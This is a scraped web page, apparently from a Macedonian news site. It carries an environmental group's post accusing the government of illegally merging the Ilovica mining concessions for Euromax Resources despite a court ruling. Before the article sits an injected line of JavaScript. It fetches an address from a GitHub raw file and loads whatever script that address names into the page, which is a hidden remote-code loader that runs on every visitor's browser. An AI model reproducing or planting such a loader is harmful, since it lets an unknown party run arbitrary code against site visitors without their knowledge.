;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Еко долина: Влада лаже - Пресуда не лаже - Антропол
АктуелноЛокално

Еко долина: Влада лаже – Пресуда не лаже

  • Објава на Еко котлина

Почитувани наши подржувачи, во прилог ја гледате скандалозната дванаесетта по ред пресуда на Управниот Суд, која е во корист на Еуромакс Рисорсис. Со ова пресуда без никаква аргументација судиите (ги има подолу со име и презиме) ги поплукаа и погазија на претходните единаесет свои пресуди кои аргументирано и јасно беа во наша корист и ја оправдуваа одлуката на Владата од 2019та година за едностран раскин на истечената концесија “Иловица 6” на Еуромакс Рисорсис.

Иако во последната 12та пресуда неаргументирано и од ракав Управниот Суд ја задолжува Владата да ја врати во сила концесијата “Иловица 6”, но сепак што е најважно за нас СЕ ОТФРЛА барањето на Еуромакс Рисорсис за Владата да им ги спои концесиите “Иловица 6” и “Иловица 11”!
Според Законот за Минерални суровини спојување на концесии е можно само ако концесионерот веќе има дозвола за експлоатација и работи, а Еуромакс се далеку од тоа.

Но што прави потоа нашата Влада? Истата скришно на последната седница од 27 јуни, а во Службен Весник од 4 јули објавено, им ги спојува концесиите!? Не држи вода оправдувањето на Владата дека судската одлука е мериторна и морало да се почитува. Едно пишува во пресудата, сосема друго тие одлучуваат!

Влада лаже пресуда не лаже

Откако не успеаја да го сокријат од јавноста ова очигледно кршење на законот, истите тие чинители од името на својата партија не замајуваат со локални референдуми, каде нели граѓаните ќе решеле дали сакаат или не сакаат рудник!? Како да не ги знаат резултатите од локалните референдуми од септември 2017та (98% против), или заборавија дека Уставен Суд отпосле ги поништи и прогласи истите за неуставни.

Наместо да го истераат целиот овој процес во рамките на законот, спремаат терен да се вадат на народот дека не сакал рудник, па ете да им удоволиме на граѓаните, ќе мора да се спогодуваме за оштета во полза на “кутрите и чесни” концесионери.

Какво е ова беззаконие? Дали живееме во организирана држава со свој устав и закони?